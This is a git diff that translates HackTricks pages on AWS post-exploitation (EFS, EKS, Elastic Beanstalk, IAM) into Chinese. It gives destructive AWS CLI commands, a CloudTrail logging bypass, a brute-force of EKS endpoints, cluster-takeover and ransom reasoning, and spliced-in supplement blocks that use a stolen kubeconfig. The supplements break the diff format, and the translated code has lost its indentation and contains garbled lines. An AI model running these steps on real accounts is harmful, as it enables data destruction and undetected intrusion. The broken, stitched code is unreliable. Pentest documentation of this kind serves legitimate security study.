delete-mount-target --mount-target-id ``` - -**Potential Impact**: Disruption of file system access and potential data loss for users or applications. 
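(补充)上面的命令需要挂载目标 ID,可以先用下面的草图枚举文件系统及其挂载目标(文件系统 ID 为占位符):
```bash
# Enumerate file systems and their mount targets to obtain a <mount_target_id>
aws efs describe-file-systems --query 'FileSystems[].FileSystemId'
aws efs describe-mount-targets --file-system-id <file_system_id>
```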
+**潜在影响**:文件系统访问中断和用户或应用程序的潜在数据丢失。 ### `elasticfilesystem:DeleteFileSystem` -An attacker could delete an entire EFS file system, which could lead to data loss and impact applications relying on the file system. - +攻击者可以删除整个 EFS 文件系统,这可能导致数据丢失并影响依赖该文件系统的应用程序。 ```perl aws efs delete-file-system --file-system-id ``` - -**Potential Impact**: Data loss and service disruption for applications using the deleted file system. +**潜在影响**:使用已删除文件系统的应用程序可能会导致数据丢失和服务中断。 ### `elasticfilesystem:UpdateFileSystem` -An attacker could update the EFS file system properties, such as throughput mode, to impact its performance or cause resource exhaustion. - +攻击者可以更新EFS文件系统属性,例如吞吐量模式,以影响其性能或导致资源耗尽。 ```sql aws efs update-file-system --file-system-id --provisioned-throughput-in-mibps ``` +**潜在影响**:文件系统性能下降或资源耗尽。 -**Potential Impact**: Degradation of file system performance or resource exhaustion. - -### `elasticfilesystem:CreateAccessPoint` and `elasticfilesystem:DeleteAccessPoint` - -An attacker could create or delete access points, altering access control and potentially granting themselves unauthorized access to the file system. +### `elasticfilesystem:CreateAccessPoint` 和 `elasticfilesystem:DeleteAccessPoint` +攻击者可以创建或删除访问点,改变访问控制,并可能授予自己对文件系统的未经授权访问。 ```arduino aws efs create-access-point --file-system-id --posix-user --root-directory aws efs delete-access-point --access-point-id ``` - -**Potential Impact**: Unauthorized access to the file system, data exposure or modification. +**潜在影响**:未经授权访问文件系统,数据泄露或修改。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md index eb1f77f46..54d0c9047 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md @@ -1,113 +1,104 @@ -# AWS - EKS Post Exploitation +# AWS - EKS 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## EKS -For mor information check +有关更多信息,请查看 {{#ref}} ../aws-services/aws-eks-enum.md {{#endref}} -### Enumerate the cluster from the AWS Console +### 从 AWS 控制台枚举集群 -If you have the permission **`eks:AccessKubernetesApi`** you can **view Kubernetes objects** via AWS EKS console ([Learn more](https://docs.aws.amazon.com/eks/latest/userguide/view-workloads.html)). +如果您拥有权限 **`eks:AccessKubernetesApi`**,您可以通过 AWS EKS 控制台 **查看 Kubernetes 对象** ([了解更多](https://docs.aws.amazon.com/eks/latest/userguide/view-workloads.html))。 -### Connect to AWS Kubernetes Cluster - -- Easy way: +### 连接到 AWS Kubernetes 集群 +- 简单方法: ```bash # Generate kubeconfig aws eks update-kubeconfig --name aws-eks-dev ``` +- 不是那么简单的方法: -- Not that easy way: - -If you can **get a token** with **`aws eks get-token --name `** but you don't have permissions to get cluster info (describeCluster), you could **prepare your own `~/.kube/config`**. However, having the token, you still need the **url endpoint to connect to** (if you managed to get a JWT token from a pod read [here](aws-eks-post-exploitation.md#get-api-server-endpoint-from-a-jwt-token)) and the **name of the cluster**. - -In my case, I didn't find the info in CloudWatch logs, but I **found it in LaunchTemaplates userData** and in **EC2 machines in userData also**. 
You can see this info in **userData** easily, for example in the next example (the cluster name was cluster-name): +如果你可以 **获取一个令牌** 使用 **`aws eks get-token --name `** 但你没有权限获取集群信息 (describeCluster),你可以 **准备你自己的 `~/.kube/config`**。然而,拥有令牌后,你仍然需要 **连接的 URL 端点** (如果你设法从一个 pod 获取了 JWT 令牌,请阅读 [这里](aws-eks-post-exploitation.md#get-api-server-endpoint-from-a-jwt-token)) 和 **集群的名称**。 +在我的案例中,我没有在 CloudWatch 日志中找到信息,但我 **在 LaunchTemplates 的 userData 中找到了它**,并且在 **EC2 机器的 userData 中也找到了**。你可以很容易地在 **userData** 中看到这些信息,例如在下一个示例中(集群名称是 cluster-name): ```bash API_SERVER_URL=https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-east-1.eks.amazonaws.com /etc/eks/bootstrap.sh cluster-name --kubelet-extra-args '--node-labels=eks.amazonaws.com/sourceLaunchTemplateVersion=1,alpha.eksctl.io/cluster-name=cluster-name,alpha.eksctl.io/nodegroup-name=prd-ondemand-us-west-2b,role=worker,eks.amazonaws.com/nodegroup-image=ami-002539dd2c532d0a5,eks.amazonaws.com/capacityType=ON_DEMAND,eks.amazonaws.com/nodegroup=prd-ondemand-us-west-2b,type=ondemand,eks.amazonaws.com/sourceLaunchTemplateId=lt-0f0f0ba62bef782e5 --max-pods=58' --b64-cluster-ca $B64_CLUSTER_CA --apiserver-endpoint $API_SERVER_URL --dns-cluster-ip $K8S_CLUSTER_DNS_IP --use-max-pods false ``` -
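(补充)也可以直接用 AWS CLI 拉取 LaunchTemplate 或实例的 userData 来查找这些值,下面是一个最小草图(Launch Template ID 与实例 ID 均为假设的占位符):
```bash
# Dump the userData of a launch template version (IDs are placeholders)
aws ec2 describe-launch-template-versions \
  --launch-template-id <launch_template_id> --versions '$Latest' \
  --query 'LaunchTemplateVersions[0].LaunchTemplateData.UserData' --output text | base64 -d

# Dump the userData of a running EC2 node
aws ec2 describe-instance-attribute --instance-id <instance_id> \
  --attribute userData --query 'UserData.Value' --output text | base64 -d
```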
-kube config - +kube 配置 ```yaml describe-cache-parametersapiVersion: v1 clusters: - - cluster: - certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUMvakNDQWVhZ0F3SUJBZ0lCQURBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwcmRXSmwKY201bGRHVnpNQjRYRFRJeU1USXlPREUyTWpjek1Wb1hEVE15TVRJeU5URTJNamN6TVZvd0ZURVRNQkVHQTFVRQpBeE1LYTNWaVpYSnVaWFJsY3pDQ0FTSXdEUVlKS29aSWh2Y05BUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTDlXCk9OS0ZqeXZoRUxDZGhMNnFwWkMwa1d0UURSRVF1UzVpRDcwK2pjbjFKWXZ4a3FsV1ZpbmtwOUt5N2x2ME5mUW8KYkNqREFLQWZmMEtlNlFUWVVvOC9jQXJ4K0RzWVlKV3dzcEZGbWlsY1lFWFZHMG5RV1VoMVQ3VWhOanc0MllMRQpkcVpzTGg4OTlzTXRLT1JtVE5sN1V6a05pTlUzSytueTZSRysvVzZmbFNYYnRiT2kwcXJSeFVpcDhMdWl4WGRVCnk4QTg3VjRjbllsMXo2MUt3NllIV3hhSm11eWI5enRtbCtBRHQ5RVhOUXhDMExrdWcxSDBqdTl1MDlkU09YYlkKMHJxY2lINjYvSTh0MjlPZ3JwNkY0dit5eUNJUjZFQURRaktHTFVEWUlVSkZ4WXA0Y1pGcVA1aVJteGJ5Nkh3UwpDSE52TWNJZFZRRUNQMlg5R2c4Q0F3RUFBYU5aTUZjd0RnWURWUjBQQVFIL0JBUURBZ0trTUE4R0ExVWRFd0VCCi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZQVXFsekhWZmlDd0xqalhPRmJJUUc3L0VxZ1hNQlVHQTFVZEVRUU8KTUF5Q0NtdDFZbVZ5Ym1WMFpYTXdEUVlKS29aSWh2Y05BUUVMQlFBRGdnRUJBS1o4c0l4aXpsemx0aXRPcGcySgpYV0VUSThoeWxYNWx6cW1mV0dpZkdFVVduUDU3UEVtWW55eWJHbnZ5RlVDbnczTldMRTNrbEVMQVE4d0tLSG8rCnBZdXAzQlNYamdiWFovdWVJc2RhWlNucmVqNU1USlJ3SVFod250ZUtpU0J4MWFRVU01ZGdZc2c4SlpJY3I2WC8KRG5POGlHOGxmMXVxend1dUdHSHM2R1lNR0Mvd1V0czVvcm1GS291SmtSUWhBZElMVkNuaStYNCtmcHUzT21UNwprS3VmR0tyRVlKT09VL1c2YTB3OTRycU9iSS9Mem1GSWxJQnVNcXZWVDBwOGtlcTc1eklpdGNzaUJmYVVidng3Ci9sMGhvS1RqM0IrOGlwbktIWW4wNGZ1R2F2YVJRbEhWcldDVlZ4c3ZyYWpxOUdJNWJUUlJ6TnpTbzFlcTVZNisKRzVBPQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg== - server: https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-west-2.eks.amazonaws.com - name: arn:aws:eks:us-east-1::cluster/ +- cluster: +certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUMvakNDQWVhZ0F3SUJBZ0lCQURBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwcmRXSmwKY201bGRHVnpNQjRYRFRJeU1USXlPREUyTWpjek1Wb1hEVE15TVRJeU5URTJNamN6TVZvd0ZURVRNQkVHQTFVRQpBeE1LYTNWaVpYSnVaWFJsY3pDQ0FTSXdEUVlKS29aSWh2Y05BUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTDlXCk9OS0ZqeXZoRUxDZGhMNnFwWkMwa1d0UURSRVF1UzVpRDcwK2pjbjFKWXZ4a3FsV1ZpbmtwOUt5N2x2ME5mUW8KYkNqREFLQWZmMEtlNlFUWVVvOC9jQXJ4K0RzWVlKV3dzcEZGbWlsY1lFWFZHMG5RV1VoMVQ3VWhOanc0MllMRQpkcVpzTGg4OTlzTXRLT1JtVE5sN1V6a05pTlUzSytueTZSRysvVzZmbFNYYnRiT2kwcXJSeFVpcDhMdWl4WGRVCnk4QTg3VjRjbllsMXo2MUt3NllIV3hhSm11eWI5enRtbCtBRHQ5RVhOUXhDMExrdWcxSDBqdTl1MDlkU09YYlkKMHJxY2lINjYvSTh0MjlPZ3JwNkY0dit5eUNJUjZFQURRaktHTFVEWUlVSkZ4WXA0Y1pGcVA1aVJteGJ5Nkh3UwpDSE52TWNJZFZRRUNQMlg5R2c4Q0F3RUFBYU5aTUZjd0RnWURWUjBQQVFIL0JBUURBZ0trTUE4R0ExVWRFd0VCCi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZQVXFsekhWZmlDd0xqalhPRmJJUUc3L0VxZ1hNQlVHQTFVZEVRUU8KTUF5Q0NtdDFZbVZ5Ym1WMFpYTXdEUVlKS29aSWh2Y05BUUVMQlFBRGdnRUJBS1o4c0l4aXpsemx0aXRPcGcySgpYV0VUSThoeWxYNWx6cW1mV0dpZkdFVVduUDU3UEVtWW55eWJHbnZ5RlVDbnczTldMRTNrbEVMQVE4d0tLSG8rCnBZdXAzQlNYamdiWFovdWVJc2RhWlNucmVqNU1USlJ3SVFod250ZUtpU0J4MWFRVU01ZGdZc2c4SlpJY3I2WC8KRG5POGlHOGxmMXVxend1dUdHSHM2R1lNR0Mvd1V0czVvcm1GS291SmtSUWhBZElMVkNuaStYNCtmcHUzT21UNwprS3VmR0tyRVlKT09VL1c2YTB3OTRycU9iSS9Mem1GSWxJQnVNcXZWVDBwOGtlcTc1eklpdGNzaUJmYVVidng3Ci9sMGhvS1RqM0IrOGlwbktIWW4wNGZ1R2F2YVJRbEhWcldDVlZ4c3ZyYWpxOUdJNWJUUlJ6TnpTbzFlcTVZNisKRzVBPQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg== +server: https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-west-2.eks.amazonaws.com +name: arn:aws:eks:us-east-1::cluster/ contexts: - - context: - cluster: arn:aws:eks:us-east-1::cluster/ - user: arn:aws:eks:us-east-1::cluster/ - name: arn:aws:eks:us-east-1::cluster/ +- context: +cluster: arn:aws:eks:us-east-1::cluster/ +user: 
arn:aws:eks:us-east-1::cluster/ +name: arn:aws:eks:us-east-1::cluster/ current-context: arn:aws:eks:us-east-1::cluster/ kind: Config preferences: {} users: - - name: arn:aws:eks:us-east-1::cluster/ - user: - exec: - apiVersion: client.authentication.k8s.io/v1beta1 - args: - - --region - - us-west-2 - - --profile - - - - eks - - get-token - - --cluster-name - - - command: aws - env: null - interactiveMode: IfAvailable - provideClusterInfo: false +- name: arn:aws:eks:us-east-1::cluster/ +user: +exec: +apiVersion: client.authentication.k8s.io/v1beta1 +args: +- --region +- us-west-2 +- --profile +- +- eks +- get-token +- --cluster-name +- +command: aws +env: null +interactiveMode: IfAvailable +provideClusterInfo: false ``` -
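(补充)构造好 kubeconfig 或拿到令牌后,可以用下面的草图快速验证访问权限(kubeconfig 文件名、集群名等均为假设的占位符):
```bash
# Verify access with the crafted kubeconfig (file name is a placeholder)
kubectl --kubeconfig ./stolen-kubeconfig get namespaces
kubectl --kubeconfig ./stolen-kubeconfig auth can-i --list

# Or skip the kubeconfig and pass the endpoint + token directly
TOKEN=$(aws eks get-token --cluster-name <cluster_name> | jq -r '.status.token')
kubectl --server "$API_SERVER_URL" --token "$TOKEN" --insecure-skip-tls-verify get pods -A
```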
-### From AWS to Kubernetes +### 从 AWS 到 Kubernetes -The **creator** of the **EKS cluster** is **ALWAYS** going to be able to get into the kubernetes cluster part of the group **`system:masters`** (k8s admin). At the time of this writing there is **no direct way** to find **who created** the cluster (you can check CloudTrail). And the is **no way** to **remove** that **privilege**. +**EKS 集群**的**创建者****总是**能够进入**`system:masters`**组的 Kubernetes 集群部分(k8s 管理员)。在撰写本文时,**没有直接的方法**来查找**谁创建了**该集群(您可以检查 CloudTrail)。并且**无法****移除**该**权限**。 -The way to grant **access to over K8s to more AWS IAM users or roles** is using the **configmap** **`aws-auth`**. +授予**更多 AWS IAM 用户或角色对 K8s 的访问权限**的方法是使用**configmap** **`aws-auth`**。 > [!WARNING] -> Therefore, anyone with **write access** over the config map **`aws-auth`** will be able to **compromise the whole cluster**. +> 因此,任何对 config map **`aws-auth`**具有**写访问权限**的人都将能够**危害整个集群**。 -For more information about how to **grant extra privileges to IAM roles & users** in the **same or different account** and how to **abuse** this to [**privesc check this page**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#aws-eks-aws-auth-configmaps). +有关如何在**同一或不同账户**中**授予 IAM 角色和用户额外权限**以及如何**滥用**此权限的更多信息,请查看[**privesc 检查此页面**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#aws-eks-aws-auth-configmaps)。 -Check also[ **this awesome**](https://blog.lightspin.io/exploiting-eks-authentication-vulnerability-in-aws-iam-authenticator) **post to learn how the authentication IAM -> Kubernetes work**. +还可以查看[**这篇精彩的**](https://blog.lightspin.io/exploiting-eks-authentication-vulnerability-in-aws-iam-authenticator) **文章以了解 IAM -> Kubernetes 的身份验证是如何工作的**。 -### From Kubernetes to AWS +### 从 Kubernetes 到 AWS -It's possible to allow an **OpenID authentication for kubernetes service account** to allow them to assume roles in AWS. Learn how [**this work in this page**](../../kubernetes-security/kubernetes-pivoting-to-clouds.md#workflow-of-iam-role-for-service-accounts-1). +可以允许**Kubernetes 服务账户的 OpenID 身份验证**以允许它们在 AWS 中承担角色。了解[**这在此页面中的工作原理**](../../kubernetes-security/kubernetes-pivoting-to-clouds.md#workflow-of-iam-role-for-service-accounts-1)。 -### GET Api Server Endpoint from a JWT Token - -Decoding the JWT token we get the cluster id & also the region. ![image](https://github.com/HackTricks-wiki/hacktricks-cloud/assets/87022719/0e47204a-eea5-4fcb-b702-36dc184a39e9) Knowing that the standard format for EKS url is +### 从 JWT 令牌获取 Api 服务器端点 +解码 JWT 令牌,我们获得集群 ID 和区域。![image](https://github.com/HackTricks-wiki/hacktricks-cloud/assets/87022719/0e47204a-eea5-4fcb-b702-36dc184a39e9) 知道 EKS URL 的标准格式是 ```bash https://...eks.amazonaws.com ``` - -Didn't find any documentation that explain the criteria for the 'two chars' and the 'number'. But making some test on my behalf I see recurring these one: +没有找到任何文档来解释“两个字符”和“数字”的标准。但我自己进行了一些测试,发现这些是重复出现的: - gr7 - yl4 -Anyway are just 3 chars we can bruteforce them. 
Use the below script for generating the list - +无论如何,这只是3个字符,我们可以对它们进行暴力破解。使用下面的脚本生成列表。 ```python from itertools import product from string import ascii_lowercase @@ -116,44 +107,37 @@ letter_combinations = product('abcdefghijklmnopqrstuvwxyz', repeat = 2) number_combinations = product('0123456789', repeat = 1) result = [ - f'{''.join(comb[0])}{comb[1][0]}' - for comb in product(letter_combinations, number_combinations) +f'{''.join(comb[0])}{comb[1][0]}' +for comb in product(letter_combinations, number_combinations) ] with open('out.txt', 'w') as f: - f.write('\n'.join(result)) +f.write('\n'.join(result)) ``` - -Then with wfuzz - +然后使用 wfuzz ```bash wfuzz -Z -z file,out.txt --hw 0 https://.FUZZ..eks.amazonaws.com ``` - > [!WARNING] -> Remember to replace & . +> 记得替换 & 。 -### Bypass CloudTrail +### 绕过 CloudTrail -If an attacker obtains credentials of an AWS with **permission over an EKS**. If the attacker configures it's own **`kubeconfig`** (without calling **`update-kubeconfig`**) as explained previously, the **`get-token`** doesn't generate logs in Cloudtrail because it doesn't interact with the AWS API (it just creates the token locally). +如果攻击者获得了具有 **EKS 权限** 的 AWS 凭证。如果攻击者配置自己的 **`kubeconfig`**(不调用 **`update-kubeconfig`**),如前所述,**`get-token`** 不会在 CloudTrail 中生成日志,因为它不与 AWS API 交互(它只是本地创建令牌)。 -So when the attacker talks with the EKS cluster, **cloudtrail won't log anything related to the user being stolen and accessing it**. +因此,当攻击者与 EKS 集群交互时,**cloudtrail 不会记录与被盗用户及其访问相关的任何内容**。 -Note that the **EKS cluster might have logs enabled** that will log this access (although, by default, they are disabled). +请注意,**EKS 集群可能启用了日志**,将记录此访问(尽管默认情况下,它们是禁用的)。 -### EKS Ransom? +### EKS 勒索? -By default the **user or role that created** a cluster is **ALWAYS going to have admin privileges** over the cluster. And that the only "secure" access AWS will have over the Kubernetes cluster. +默认情况下,**创建**集群的 **用户或角色** **始终拥有集群的管理员权限**。这是 AWS 对 Kubernetes 集群的唯一“安全”访问。 -So, if an **attacker compromises a cluster using fargate** and **removes all the other admins** and d**eletes the AWS user/role that created** the Cluster, ~~the attacker could have **ransomed the cluste**~~**r**. +因此,如果 **攻击者通过 Fargate 破坏了集群**,并 **删除了所有其他管理员**,并 **删除了创建**集群的 AWS 用户/角色,~~攻击者可能已经 **勒索了集群**~~**。 > [!TIP] -> Note that if the cluster was using **EC2 VMs**, it could be possible to get Admin privileges from the **Node** and recover the cluster. +> 请注意,如果集群使用 **EC2 虚拟机**,则可能从 **节点** 获取管理员权限并恢复集群。 > -> Actually, If the cluster is using Fargate you could EC2 nodes or move everything to EC2 to the cluster and recover it accessing the tokens in the node. 
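(补充)在评估这种勒索/接管场景时,可以先用下面的草图查看 aws-auth 中映射了哪些主体(即除创建者外还有哪些管理员),以及集群是否开启了控制平面日志(集群名为占位符):
```bash
# See which IAM principals are mapped into the cluster (candidates to remove in a ransom scenario)
kubectl -n kube-system get configmap aws-auth -o yaml

# Check whether control-plane logging is enabled (related to the CloudTrail bypass section above)
aws eks describe-cluster --name <cluster_name> --query 'cluster.logging'
```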
+> 实际上,如果集群使用 Fargate,您可以将 EC2 节点或将所有内容移动到 EC2 集群并通过访问节点中的令牌来恢复它。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md index 6267ee02f..6bbb031b8 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md @@ -1,10 +1,10 @@ -# AWS - Elastic Beanstalk Post Exploitation +# AWS - Elastic Beanstalk 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## Elastic Beanstalk -For more information: +更多信息: {{#ref}} ../aws-services/aws-elastic-beanstalk-enum.md @@ -13,72 +13,58 @@ For more information: ### `elasticbeanstalk:DeleteApplicationVersion` > [!NOTE] -> TODO: Test if more permissions are required for this - -An attacker with the permission `elasticbeanstalk:DeleteApplicationVersion` can **delete an existing application version**. This action could disrupt application deployment pipelines or cause loss of specific application versions if not backed up. +> TODO: 测试是否需要更多权限 +拥有权限 `elasticbeanstalk:DeleteApplicationVersion` 的攻击者可以 **删除现有的应用程序版本**。此操作可能会中断应用程序部署管道或导致特定应用程序版本的丢失(如果没有备份)。 ```bash aws elasticbeanstalk delete-application-version --application-name my-app --version-label my-version ``` - -**Potential Impact**: Disruption of application deployment and potential loss of application versions. +**潜在影响**:应用程序部署中断和潜在的应用程序版本丢失。 ### `elasticbeanstalk:TerminateEnvironment` > [!NOTE] -> TODO: Test if more permissions are required for this - -An attacker with the permission `elasticbeanstalk:TerminateEnvironment` can **terminate an existing Elastic Beanstalk environment**, causing downtime for the application and potential data loss if the environment is not configured for backups. +> TODO: 测试是否需要更多权限 +拥有权限 `elasticbeanstalk:TerminateEnvironment` 的攻击者可以**终止现有的 Elastic Beanstalk 环境**,导致应用程序停机,并且如果环境未配置备份,可能会导致数据丢失。 ```bash aws elasticbeanstalk terminate-environment --environment-name my-existing-env ``` - -**Potential Impact**: Downtime of the application, potential data loss, and disruption of services. +**潜在影响**:应用程序的停机、潜在的数据丢失和服务中断。 ### `elasticbeanstalk:DeleteApplication` > [!NOTE] -> TODO: Test if more permissions are required for this - -An attacker with the permission `elasticbeanstalk:DeleteApplication` can **delete an entire Elastic Beanstalk application**, including all its versions and environments. This action could cause a significant loss of application resources and configurations if not backed up. +> TODO: 测试是否需要更多权限 +拥有权限 `elasticbeanstalk:DeleteApplication` 的攻击者可以**删除整个 Elastic Beanstalk 应用程序**,包括其所有版本和环境。如果没有备份,此操作可能导致应用程序资源和配置的重大损失。 ```bash aws elasticbeanstalk delete-application --application-name my-app --terminate-env-by-force ``` - -**Potential Impact**: Loss of application resources, configurations, environments, and application versions, leading to service disruption and potential data loss. 
+**潜在影响**:应用程序资源、配置、环境和应用程序版本的丢失,导致服务中断和潜在的数据丢失。 ### `elasticbeanstalk:SwapEnvironmentCNAMEs` > [!NOTE] -> TODO: Test if more permissions are required for this - -An attacker with the `elasticbeanstalk:SwapEnvironmentCNAMEs` permission can **swap the CNAME records of two Elastic Beanstalk environments**, which might cause the wrong version of the application to be served to users or lead to unintended behavior. +> TODO: 测试是否需要更多权限 +拥有 `elasticbeanstalk:SwapEnvironmentCNAMEs` 权限的攻击者可以**交换两个 Elastic Beanstalk 环境的 CNAME 记录**,这可能导致错误版本的应用程序被提供给用户或导致意外行为。 ```bash aws elasticbeanstalk swap-environment-cnames --source-environment-name my-env-1 --destination-environment-name my-env-2 ``` - -**Potential Impact**: Serving the wrong version of the application to users or causing unintended behavior in the application due to swapped environments. +**潜在影响**:向用户提供错误版本的应用程序或由于环境交换导致应用程序出现意外行为。 ### `elasticbeanstalk:AddTags`, `elasticbeanstalk:RemoveTags` > [!NOTE] -> TODO: Test if more permissions are required for this - -An attacker with the `elasticbeanstalk:AddTags` and `elasticbeanstalk:RemoveTags` permissions can **add or remove tags on Elastic Beanstalk resources**. This action could lead to incorrect resource allocation, billing, or resource management. +> TODO: 测试是否需要更多权限 +拥有 `elasticbeanstalk:AddTags` 和 `elasticbeanstalk:RemoveTags` 权限的攻击者可以**在 Elastic Beanstalk 资源上添加或删除标签**。此操作可能导致资源分配、计费或资源管理不正确。 ```bash aws elasticbeanstalk add-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tags Key=MaliciousTag,Value=1 aws elasticbeanstalk remove-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tag-keys MaliciousTag ``` - -**Potential Impact**: Incorrect resource allocation, billing, or resource management due to added or removed tags. +**潜在影响**:由于添加或删除标签,导致资源分配、计费或资源管理不正确。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md index f734122e8..97a579f6c 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md @@ -4,7 +4,7 @@ ## IAM -For more information about IAM access: +有关 IAM 访问的更多信息: {{#ref}} ../aws-services/aws-iam-enum.md @@ -12,96 +12,82 @@ For more information about IAM access: ## Confused Deputy Problem -If you **allow an external account (A)** to access a **role** in your account, you will probably have **0 visibility** on **who can exactly access that external account**. This is a problem, because if another external account (B) can access the external account (A) it's possible that **B will also be able to access your account**. +如果您**允许一个外部账户 (A)** 访问您账户中的**角色**,您可能对**谁可以确切访问该外部账户**几乎没有**可见性**。这是一个问题,因为如果另一个外部账户 (B) 可以访问外部账户 (A),那么**B 也可能能够访问您的账户**。 -Therefore, when allowing an external account to access a role in your account it's possible to specify an `ExternalId`. This is a "secret" string that the external account (A) **need to specify** in order to **assume the role in your organization**. As the **external account B won't know this string**, even if he has access over A he **won't be able to access your role**. +因此,在允许外部账户访问您账户中的角色时,可以指定一个 `ExternalId`。这是一个“秘密”字符串,外部账户 (A) **需要指定**以**假设您组织中的角色**。由于**外部账户 B 不会知道这个字符串**,即使他可以访问 A,他也**无法访问您的角色**。
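(补充)作为最小示例(角色 ARN 为假设的占位符,ExternalId 对应下面示例策略中的值),外部账户 (A) 在担任该角色时必须显式传入这个 ExternalId:
```bash
# Account A must supply the ExternalId when assuming the role in the victim account
aws sts assume-role \
  --role-arn arn:aws:iam::<victim_account_id>:role/<role_name> \
  --role-session-name external-id-demo \
  --external-id 12345
```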
-However, note that this `ExternalId` "secret" is **not a secret**, anyone that can **read the IAM assume role policy will be able to see it**. But as long as the external account A knows it, but the external account **B doesn't know it**, it **prevents B abusing A to access your role**. - -Example: +但是,请注意,这个 `ExternalId` “秘密”**并不是秘密**,任何可以**读取 IAM 假设角色策略的人都能看到它**。但只要外部账户 A 知道它,而外部账户 **B 不知道它**,就**可以防止 B 利用 A 访问您的角色**。 +示例: ```json { - "Version": "2012-10-17", - "Statement": { - "Effect": "Allow", - "Principal": { - "AWS": "Example Corp's AWS Account ID" - }, - "Action": "sts:AssumeRole", - "Condition": { - "StringEquals": { - "sts:ExternalId": "12345" - } - } - } +"Version": "2012-10-17", +"Statement": { +"Effect": "Allow", +"Principal": { +"AWS": "Example Corp's AWS Account ID" +}, +"Action": "sts:AssumeRole", +"Condition": { +"StringEquals": { +"sts:ExternalId": "12345" +} +} +} } ``` - > [!WARNING] -> For an attacker to exploit a confused deputy he will need to find somehow if principals of the current account can impersonate roles in other accounts. +> 攻击者要利用混淆的副手,他需要以某种方式查找当前账户的主体是否可以在其他账户中冒充角色。 -### Unexpected Trusts - -#### Wildcard as principal +### 意外的信任 +#### 通配符作为主体 ```json { - "Action": "sts:AssumeRole", - "Effect": "Allow", - "Principal": { "AWS": "*" } +"Action": "sts:AssumeRole", +"Effect": "Allow", +"Principal": { "AWS": "*" } } ``` +此策略**允许所有AWS**承担该角色。 -This policy **allows all AWS** to assume the role. - -#### Service as principal - +#### 服务作为主体 ```json { - "Action": "lambda:InvokeFunction", - "Effect": "Allow", - "Principal": { "Service": "apigateway.amazonaws.com" }, - "Resource": "arn:aws:lambda:000000000000:function:foo" +"Action": "lambda:InvokeFunction", +"Effect": "Allow", +"Principal": { "Service": "apigateway.amazonaws.com" }, +"Resource": "arn:aws:lambda:000000000000:function:foo" } ``` +此策略**允许任何账户**配置其 apigateway 以调用此 Lambda。 -This policy **allows any account** to configure their apigateway to call this Lambda. - -#### S3 as principal - +#### S3 作为主体 ```json "Condition": { "ArnLike": { "aws:SourceArn": "arn:aws:s3:::source-bucket" }, - "StringEquals": { - "aws:SourceAccount": "123456789012" - } +"StringEquals": { +"aws:SourceAccount": "123456789012" +} } ``` +如果将 S3 存储桶作为主体,因为 S3 存储桶没有账户 ID,如果你**删除了你的存储桶而攻击者在他们自己的账户中创建了它**,那么他们可能会利用这一点。 -If an S3 bucket is given as a principal, because S3 buckets do not have an Account ID, if you **deleted your bucket and the attacker created** it in their own account, then they could abuse this. - -#### Not supported - +#### 不支持 ```json { - "Effect": "Allow", - "Principal": { "Service": "cloudtrail.amazonaws.com" }, - "Action": "s3:PutObject", - "Resource": "arn:aws:s3:::myBucketName/AWSLogs/MY_ACCOUNT_ID/*" +"Effect": "Allow", +"Principal": { "Service": "cloudtrail.amazonaws.com" }, +"Action": "s3:PutObject", +"Resource": "arn:aws:s3:::myBucketName/AWSLogs/MY_ACCOUNT_ID/*" } ``` - -A common way to avoid Confused Deputy problems is the use of a condition with `AWS:SourceArn` to check the origin ARN. However, **some services might not support that** (like CloudTrail according to some sources). 
